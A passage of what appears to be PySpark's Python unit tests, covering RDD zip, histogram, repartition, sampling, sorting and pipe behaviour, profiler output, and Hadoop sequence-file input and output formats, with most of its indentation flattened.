self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
        # regression test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_repartition_no_skewed(self):
num_partitions = 20
a = self.sc.parallelize(range(int(1000)), 2)
l = a.repartition(num_partitions).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
l = a.coalesce(num_partitions, True).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
def test_repartition_on_textfile(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
rdd = self.sc.textFile(path)
result = rdd.repartition(1).collect()
self.assertEqual(u"Hello World!", result[0])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 200001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
def test_narrow_dependency_in_join(self):
rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
parted = rdd.partitionBy(2)
self.assertEqual(2, parted.union(parted).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
tracker = self.sc.statusTracker()
self.sc.setJobGroup("test1", "test", True)
d = sorted(parted.join(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test1")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test2", "test", True)
d = sorted(parted.join(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test2")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test3", "test", True)
d = sorted(parted.cogroup(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test3")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test4", "test", True)
d = sorted(parted.cogroup(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test4")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('cc').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
old_stdout = sys.stdout
sys.stdout = io = StringIO()
self.sc.show_profiles()
self.assertTrue("heavy_foo" in io.getvalue())
sys.stdout = old_stdout
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 18):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class ProfilerTests2(unittest.TestCase):
def test_profiler_disabled(self):
sc = SparkContext(conf=SparkConf().set("spark.python.profile", "false"))
try:
self.assertRaisesRegexp(
RuntimeError,
"'spark.python.profile' configuration must be set",
lambda: sc.show_profiles())
self.assertRaisesRegexp(
RuntimeError,
"'spark.python.profile' configuration must be set",
lambda: sc.dump_profiles("/tmp/abc"))
finally:
sc.stop()
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
for v in maps:
self.assertTrue(v in em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
oldconf = {"mapreduce.input.fileinputformat.inputdir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
newconf = {"mapreduce.input.fileinputformat.inputdir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = b"short binary data"
with open(os.path.join(path, "part-0000"), 'wb') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
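        # delete the file right away; only its unique path is reused below as a Hadoop output directory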
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
            self.assertTrue(v in em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
            self.assertTrue(v in dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
            self.assertTrue(v in dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.Text",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
@unittest.skipIf(sys.version >= "3", "serialize of array")
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
